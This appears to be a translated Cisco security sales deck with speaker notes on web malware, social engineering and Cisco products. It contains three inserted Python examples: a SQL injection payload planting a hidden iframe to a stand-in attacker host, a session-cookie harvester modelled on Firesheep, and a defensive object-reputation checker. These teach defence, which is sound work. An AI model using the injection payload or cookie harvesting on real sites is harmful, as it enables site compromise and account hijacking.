3. Social networks in the hackers' sights
21% of people accept "friend requests" from people they do not know
64% of people click links sent by "friends" without thinking
47% of Internet users have already been victims of malware infections
20% of people have already run into identity theft
55% of people have been impersonated in order to obtain personal data
8. And what is your password? 51% of users typically have 1 to 4 passwords for all of their accounts
9. Malware. Web problems. Data leaks. Acceptable-use violations. 40% productivity loss from personal web use during working hours. Risk of breaking the law when users download prohibited content.
12. SQL Injection (1 in 5)** *Source: IronPort TOC **Source: WhiteHat Security, Website Security Statistics Report 10/2007 & PPT 8/2008
13. Hackers attack legitimate sites
Diagram (layout lost): a malicious host, www.iamlegitimate.com, HTTP GET /
Botnets are set up to inject malware into web hosts through SQL injection, exploiting vulnerabilities in web applications. Hackers use SQL injection to insert JavaScript and iFrames that redirect users to websites hosting the malware.
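The mass iframe injection described above, as an added example that is not from the presentation: a page-update handler that builds its SQL by string concatenation, the payload that turns a single-row update into a site-wide one, and the parameterized handler plus output encoding that stop it. The content table is an in-memory SQLite database constructed for the example, and evil.example is a made-up attacker host.

```python
import html
import sqlite3

# Made-up attacker-controlled host for the example; the 0x0 frame is invisible.
EVIL_IFRAME = '<iframe src="http://evil.example/" width="0" height="0"></iframe>'
# Closing the string literal and commenting out the rest of the statement
# drops the WHERE clause, so the UPDATE hits every row of the table.
PAYLOAD = EVIL_IFRAME + "' -- "


def make_db():
    """Constructed sample content table for a small site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?)",
        [(1, "home", "Welcome"), (2, "about", "About us"), (3, "news", "Latest news")],
    )
    conn.commit()
    return conn


def update_body_vulnerable(conn, page_id, body):
    # The caller's input becomes part of the SQL text itself.
    sql = "UPDATE pages SET body = '" + body + "' WHERE id = " + str(int(page_id))
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn, page_id, body):
    # Bound parameters: the input is data, never SQL.
    conn.execute("UPDATE pages SET body = ? WHERE id = ?", (body, page_id))
    conn.commit()


def bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


def render(conn, page_id, escape=True):
    """Render a page body; escaping keeps stored markup from being executed."""
    (body,) = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return "<p>%s</p>" % (html.escape(body) if escape else body)


def demo():
    """Run the same payload against both handlers and return what each leaves behind."""
    vuln = make_db()
    update_body_vulnerable(vuln, 3, PAYLOAD)  # every page now serves the iframe
    safe = make_db()
    update_body_safe(safe, 3, PAYLOAD)        # only page 3 holds the literal text
    return bodies(vuln), bodies(safe), render(safe, 3)


if __name__ == "__main__":
    vuln_bodies, safe_bodies, safe_html = demo()
    print("vulnerable:", vuln_bodies)
    print("parameterized:", safe_bodies)
    print("rendered with escaping:", safe_html)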
19. But sometimes you help the hackers yourselves
A link is posted on (or sent in the name of) a compromised social network account. The link takes you to a site with an "awesome" video that asks you to install the latest version of Flash Player or a missing codec.
28. The changing threat landscape (then vs. now)
Motivation: from fame to money
Method: from brazen to stealthy
Focus: from indiscriminate to targeted
Means: from manual to automated
Result: from disruption to catastrophe
Type: from unique code to toolkit
Target: from infrastructure to applications
Agent: from insider to third party
29. Why do attackers bother?! $$$ Money flows $$$
Diagram (layout lost): first-wave attacks versus second-wave attacks, with columns for developers, intermediaries, result and attack tools. Items in the diagram: direct attack by a hacker, fame, attacks on individual systems and applications, espionage, malware, building botnets, DDoS, infection, extortion, worms, spam distribution, revenge, viruses, botnet management (rental, sale), advertising, trojans, pharming / DNS poisoning, phishing / information gathering, fraudulent sales, spyware, information theft, click fraud, sale of information, fraud.
30. Is it really profitable?!
An affiliate network selling scareware: affiliates install the scareware on infected computers and receive a 60% commission on sales.
Sales over ten days: $147K (154,825 installs and 2,772 sales), about $5M per year.
"We don't hit our own!"
Bakasoftware sales statistics for 10 days. Source: http://www.secureworks.com/research/threats/rogue-antivirus-part-2/?threat=rogue-antivirus-part-2
32. Objects are images, HTML code, JavaScript... Compromised hosts pull malicious content from external sources. Security means inspecting every object individually, not just the initial request.
33. BoingBoing.net: a popular blog
URLs in the browser: 1
HTTP requests: 162
Images: 66, from 18 different domains
Scripts: 87, from 7 domains
Cookies: 118, from 15 domains
Flash objects: 8, from 4 domains
35. We have antivirus and a firewall!
Is endpoint protection based only on antivirus software effective?
Can the firewall inspect content?
How will technical controls help against attacks that use social engineering?
37. How to fight back?
Staff awareness of information security threats. Endpoint protection. Monitoring compliance with the security policy. Content security. Infection monitoring. Data leak control.
38. Industry security architecture model
Use cases across the top: remote access, collaboration, mobility, virtualization, "clouds".
Secured systems / device: incident investigation, resource management.
Device security: lock / wipe memory, new attacks*, antivirus, encryption, audit.
Application security: web application, secure coding, intrusion, service management, encryption.
Content / data security: email, web, DLP, data management.
Network / system management: identification, alerts, logs, monitoring, directories, policy.
Network security: VPN, firewall, IDS / IPS, API interfaces.
Trusted system / infrastructure: physical layer, device, compute, storage, network.
* = Cisco Threat Intelligence
Based on typical industry models (Gartner, SANS Institute and others) and customer surveys.
60. A context-aware secure access solution: wired, wireless and VPN connections are supported.
62. Reasons to choose Cisco SecureX
1. Full-scale network monitoring and management: lower complexity, higher level of protection
2. Consistent, context-aware enforcement of security policies across the whole IT infrastructure
3. Unique "intelligent" solutions for detecting and defending against next-generation threats
4. Integration with network solutions to build a scalable security infrastructure from the endpoint to the data center
5. The most advanced and innovative security solutions and services, for organizations of every type and size
63. So why Cisco after all?!
1. World leader in network security. Broad portfolio of products and services. Tight integration with the network infrastructure. Architectural approach.
2. Support and protection of the latest IT. Quality control. Security research. Training and certification of specialists. Own publishing house.
3. Certification against Russian security requirements. Certified cryptography. Certified production. Industry expertise.
4. Participation in developing IT and security standards, in industry groups and committees, and in reviewing security regulations (NPA).
5. Financing of security projects. Legal import of equipment. Round-the-clock support in Russian. Spare-parts warehouses across Russia. 1000+ partners.
64. 95% of companies that tried Cisco IronPort became users of these solutions. Contact: security-request@cisco.ru
65. Want to know more? FAQ on import and certification. Cisco solutions for personal data (PDn) and STO, and for certified cryptography. Why Cisco is the best choice for security?! ... and much more.
http://www.facebook.com/CiscoRu
http://twitter.com/CiscoRussia
http://www.youtube.com/CiscoRussiaMedia
http://www.flickr.com/photos/CiscoRussia
http://vkontakte.ru/Cisco
The business environment is changing fast, with new requirements to expand customer relationships, improve productivity and reduce cost while introducing new IT business models. Result: the security practitioner has to move even faster, anticipate potential threats, respond to the risks they bring, and provide a security safety net that allows the organization to move with the change.
Mobility and consumerization of endpoints
- Stats on mobility trends (how many devices, by when)
- Stats on consumerization of endpoints in the workplace
- List a couple of security breaches that happened due to mobility
Collaboration
- Stats on collaboration apps picking up in organizations / social media
- Examples of security breaches for VoIP, video conferencing, etc.
Cloud / virtualization / externalization
- Key trends around cloud (private / virtual private / public)
- Examples of security breaches for VoIP, video conferencing, etc.
Slide layout: this slide should present 3 columns. The top part of each one lists the market trend and stats. The bottom part of each one (via build) gives a couple of security threats resulting from each respective change.

1. Mobile computing
Loss of personal information and data on mobile devices is a leading threat. For example, in July 2010 a data breach involved a stolen laptop containing personal information of more than 8,300 students and employees of P.K. Yonge Developmental Research School, which is affiliated with the University of Florida. http://news.ufl.edu/2010/08/31/yonge-privacy/
A similar incident took place in November 2010: a laptop stolen in Georgia contained personal information of nearly 14,000 patients of Centra, a Lynchburg, VA based hospital system. http://www.myfoxatlanta.com/dpp/news/local_news/Centra%3A-Stolen-Laptop-Contains-Patient-Info-20101221-ap-sd
Threats to mobile computing also come from malicious activity that attacks its targets on public networks. A well-known example is Firesheep, a Firefox browser extension that can be used as a hacking tool against users of social media and other popular sites on a Wi-Fi network: it captures the session cookies those sites send over unencrypted HTTP and lets the attacker act as the victim. This is a good illustration of mobile computing threats. In less than 6 months the tool was downloaded more than 1 million times; some of those downloads may already have turned into active attacks. https://github.com/codebutler/firesheep/downloads

2. Collaboration
Loss of sensitive data and security violations are the leading threats associated with the various forms of collaboration tools. Skype is a clear example. It is a communication tool supporting voice and video. The application itself is extremely resistant to reverse engineering and uses strong encryption for its network traffic, so Skype activity is difficult to detect and its communications nearly impossible to decipher. Skype can also traverse firewalls, creating a backdoor into the internal network. For these reasons the SANS analysis cited below recommends banning Skype to prevent unauthorized communications and access on networks subject to strict legal or administrative regulation. http://www.sans.org/reading_room/whitepapers/voip/skype-practical-security-analysis_32918
Unsecured instant messaging (IM) tools also pose many security threats, including:
- Client vulnerabilities: without proper testing, many IM clients introduce security vulnerabilities on the endpoint device.
- Data theft: IM can tunnel through the network firewall and email filter to transfer confidential material out of the organization.
- many others
http://www.technicalinfo.net/papers/IMSecurity.html
P2P sharing of copyright-protected material is another well-known security issue for many universities and colleges.

3. Virtualization and cloud
These new technologies introduce new threats. In virtualization a new "attack surface" appears in the form of the virtual machines and the hypervisor. Gartner lists the following threats:
- A compromise of the virtualization layer could result in the compromise of all hosted workloads
- The lack of visibility and controls on internal virtual networks created for VM-to-VM communications blinds existing security policy enforcement mechanisms
- Adequate controls on administrative access to the hypervisor/VMM layer and to administrative tools are lacking
- There is a potential loss of separation of duties for network and security controls when these are virtualized
http://www.gartner.com/DisplayDocument?ref=clientFriendlyUrl&id=1288115
For cloud computing, many threats arise from changes in technology and business process. The Cloud Security Alliance lists the following top cloud computing threats:
Threat #1: Abuse and nefarious use of cloud computing
Threat #2: Insecure interfaces and APIs
Threat #3: Malicious insiders
Threat #4: Shared technology issues
Threat #5: Data loss or leakage
Threat #6: Account or service hijacking
Threat #7: Unknown risk profile
http://www.cloudsecurityalliance.org/topthreats/csathreats.v1.0.pdf
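What a sidejacking tool such as Firesheep (discussed under mobile computing above) does with the plaintext traffic it sees on an open network, and the cookie attributes that blunt it, as an added example that is neither part of the original notes nor Firesheep's own code. The captured requests, hostnames and cookie values are constructed for the example; harvest_sessions pulls the session cookie out of each plaintext request for the sites it knows, and audit_set_cookie checks whether a site's Set-Cookie header carries the Secure and HttpOnly flags.

```python
# Constructed sample of plaintext HTTP requests as a sniffer on an open Wi-Fi
# network would see them. Hosts and cookie values are made up.
CAPTURED_REQUESTS = [
    "GET /home HTTP/1.1\r\nHost: social.example\r\nCookie: sid=abc123; lang=en\r\n\r\n",
    "GET /feed HTTP/1.1\r\nHost: social.example\r\nCookie: lang=en\r\n\r\n",
    "GET /inbox HTTP/1.1\r\nHost: mail.example\r\nCookie: session_id=deadbeef\r\n\r\n",
]

# Per-site name of the cookie that carries the login session (the tool's
# equivalent of a site handler). Constructed for the example.
SESSION_COOKIE_NAMES = {"social.example": "sid", "mail.example": "session_id"}


def parse_request(raw):
    """Return the request headers as a dict with lower-cased names."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_cookie_header(value):
    cookies = {}
    for part in value.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name] = val
    return cookies


def harvest_sessions(requests):
    """Return {host: session cookie value} for every plaintext request that leaks one.

    This is the whole trick: the browser attaches the session cookie to every
    request, and over plain HTTP anyone on the same network can read it."""
    found = {}
    for raw in requests:
        headers = parse_request(raw)
        host = headers.get("host", "")
        wanted = SESSION_COOKIE_NAMES.get(host)
        if wanted is None or "cookie" not in headers:
            continue
        cookies = parse_cookie_header(headers["cookie"])
        if wanted in cookies:
            found[host] = cookies[wanted]
    return found


def audit_set_cookie(set_cookie_value):
    """Check a Set-Cookie header for the attributes that defeat sidejacking."""
    attrs = [p.strip().lower() for p in set_cookie_value.split(";")[1:]]
    names = {a.split("=", 1)[0] for a in attrs}
    return {
        "secure": "secure" in names,      # browser never sends it over plain HTTP
        "httponly": "httponly" in names,  # not readable by injected script
    }


if __name__ == "__main__":
    print("leaked sessions:", harvest_sessions(CAPTURED_REQUESTS))
    print("weak:", audit_set_cookie("sid=abc123; Path=/"))
    print("hardened:", audit_set_cookie("sid=abc123; Path=/; Secure; HttpOnly"))
```

With the Secure attribute the browser never sends the cookie over plain HTTP, which removes the property the sniffer depends on; serving the whole site over HTTPS (with HSTS so the first request is not plaintext either) closes the remaining gap.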
The changing business environment is also shifting user expectations of IT. The Cisco Connected World Report shows greater demand for the ability to work from anywhere with the user's device of choice, while using video and rich media to enhance communications. Simultaneously, the report showed that IT is struggling with the performance and security implications of the proliferation of mobile devices and the delivery of a dynamic networked organization.
- 60% believe they don't need to be in the office to be productive
- 66% would accept a lower-paying job (10% lower) for more work flexibility
- 45% work an extra 2-3 hours a day since they are able to work outside the office (a further 25% work 4+ hours)
- 45% of IT professionals are unprepared to make workforces more mobile
- 57% of IT professionals said security is the biggest challenge in supporting a mobile and distributed workforce
This trend brings a set of business challenges centered on malware, data loss, and acceptable use. Threat writers know that HTTP gets them in the door, and such a real-time medium is hard to defend: more malware variants appeared in 2008 than in all of history before it, and 94% of malware attacks now come via the web. Data loss: there are ever more frequent examples of the CEO's nightmare of landing on the front page over compromised customer or partner records, and in many cases the web was the channel through which the information leaked or was stolen. Acceptable use: personal web use drains productivity and offensive content entering the enterprise introduces legal risk; there is also the risk that YouTube chokes off bandwidth from critical business applications like WebEx.
Modern malware is designed to evade legacy defenses. Two themes to highlight: (1) exploiting legitimate sites and (2) social engineering.
Exploited websites: nearly 90% of threats today are launched via exploited legitimate websites, including high-traffic, reputable sites such as MSNBC and Business Week. This shows why URL filtering is not a security solution: who would block the News category?
Social engineering: attacks take advantage of interest in current events to lead users to polished malicious sites. For example, on the eve of the US presidential inauguration a "news" story circulated about Obama's purported decision not to take the oath of office. Almost every current event today is accompanied by a new malware threat. Other campaigns exploit trust in messages from friends, sending messages on Facebook or promoting YouTube videos. Beyond directing users to web malware, these attacks also convince users to bypass their desktop defenses ("Installing this may give a virus warning. Simply click to proceed..."), highlighting the limitations of desktop defenses.
Web Reputation Filters examine every request made by the browser, from the initial HTML request to all subsequent data requests, including live data that may be fed from different domains. This gives IronPort's Web Reputation Filters an advantage over vendors that reduce web reputation to a simple URL filtering category. IronPort's Web Reputation Filters are the industry's only reputation system to include Exploited Website Defense, Botsite Defense and URL Outbreak Detection, protecting users from known and unknown exploits (including adware, Trojans, system monitors, keyloggers, malicious/tracking cookies, browser hijackers, browser helper objects and phishing attacks) delivered through cross-site scripting, cross-site request forgery, SQL injection or invisible iFrames. The power behind IronPort's reputation technology comes from the system's pattern-based assessment techniques and per-object scanning capabilities. IronPort's Web Reputation Filters are the industry's first web reputation filtering system, providing an outer layer of malware defense before malware has a chance to enter the network.
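The per-object inspection that the BoingBoing slide (one URL, 162 requests from dozens of domains) and this paragraph argue for, as an added example that is not Cisco's or IronPort's code: enumerate every object a page makes the browser fetch, group the source domains by object type the way the slide does, and attach a reputation verdict to each object rather than to the page. The page, every hostname in it and the reputation feed are constructed for the example; evil.example stands in for a site serving malware through an invisible iframe.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed first-party page; every hostname below is made up.
PAGE_URL = "http://blog.example/post/1"
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="http://cdn.example/lib.js"></script>
</head><body>
<img src="/img/logo.png">
<img src="http://ads.example/banner.png">
<iframe src="http://evil.example/" width="0" height="0"></iframe>
<object data="http://flash.example/player.swf"></object>
</body></html>"""

# Constructed stand-in for a reputation feed (domain -> verdict).
REPUTATION = {"blog.example": "good", "cdn.example": "good",
              "ads.example": "neutral", "evil.example": "bad"}

# Tag -> attribute naming the object the browser will fetch.
OBJECT_ATTRS = {"img": "src", "script": "src", "iframe": "src",
                "object": "data", "embed": "src"}


class ObjectCollector(HTMLParser):
    """Collects (tag, absolute URL) for every fetched object on the page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.objects = []

    def handle_starttag(self, tag, attrs):
        wanted = OBJECT_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                # Relative references resolve against the page URL.
                self.objects.append((tag, urljoin(self.base_url, value)))


def inventory(page_url, html_text):
    collector = ObjectCollector(page_url)
    collector.feed(html_text)
    return collector.objects


def domains_by_type(objects):
    """The slide's 'N images from M domains' view: tag -> set of hostnames."""
    out = {}
    for tag, url in objects:
        out.setdefault(tag, set()).add(urlsplit(url).hostname)
    return out


def verdicts(objects, reputation):
    """One verdict per object. Judging only the first-party URL would say 'good'."""
    return [(tag, url, reputation.get(urlsplit(url).hostname, "unknown"))
            for tag, url in objects]


def blocked(objects, reputation):
    return [url for _tag, url, verdict in verdicts(objects, reputation) if verdict == "bad"]


if __name__ == "__main__":
    objs = inventory(PAGE_URL, SAMPLE_HTML)
    for tag, hosts in domains_by_type(objs).items():
        print(f"{tag}: {len(hosts)} domain(s): {sorted(hosts)}")
    print("blocked:", blocked(objs, REPUTATION))
```

A URL-category filter sees only blog.example, which belongs to an allowed category; only by resolving each embedded object to its own origin does the hidden frame from evil.example become visible and blockable, while the unknown flash.example object is surfaced for scanning rather than silently allowed.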
Criminals are applying business acumen (the "Cybercrime MBA") to maximize innovation and profit across a portfolio of criminal techniques and business models. We lack a framework to analyze criminal businesses at a macro level. The CROI (Cybercrime Return on Investment) Matrix plots the techniques and business models that make up the cybercrime product life cycle according to their growth and revenue potential. It is modeled on the Boston Consulting Group Growth-Share Matrix.
Speaker notes: highlight how things move clockwise through the matrix: phishing 1.0 (inoculation) into Zeus and money mules (due to better payment security); IM into social networking; web exploits as the major developing technique; cash cows change less. Note what it would take for something to reach rising-star status. DDoS got a lot of ink, but it is not part of the investment, only a side benefit.
Overall picture: list of Cisco security solutions, with perhaps the architecture as a backdrop.
Cisco TrustSec, Cisco AnyConnect Secure Mobility, Cisco Virtual Office, PCI DSS Compliance, Threat Defense (Firewall, IPS), Cisco Content Security (email/web), Cisco Data Center Security, Cisco Virtualization and Cloud Security
AnyConnect Client: AnyConnect automatically creates an SSL VPN, IPsec VPN, or MACsec encrypted tunnel
Catalyst Switch: Cisco TrustSec tags data with access policy, inspects MACsec encrypted traffic, assesses the health of the endpoint device, and provides role-based access
Cisco ASA: terminates the SSL or IPsec VPN tunnel and provides traffic protection
Cisco ISE: provides role-based access policy and AAA (Authentication, Authorization, and Accounting) services
Nexus Switch: Cisco TrustSec inspects MACsec encrypted traffic, reads data policy tags, and enforces access policy
#3 cases
- Trusted security architecture with pervasive network visibility and control: reduce complexity and increase protection
- The industry's richest and most innovative security portfolio, optimized for any organization's size and needs today and into the future
- Unique context-aware threat protection and security intelligence that discovers and protects against the next generation of threats
- Consistent enforcement of policy throughout the organization, using posture and context to enable a secure borderless experience
- Network integration that enables security from the device, throughout the network, to the data center, gathering data and enforcing policy
- Validated with third-party ecosystem partners to ease integration and deployment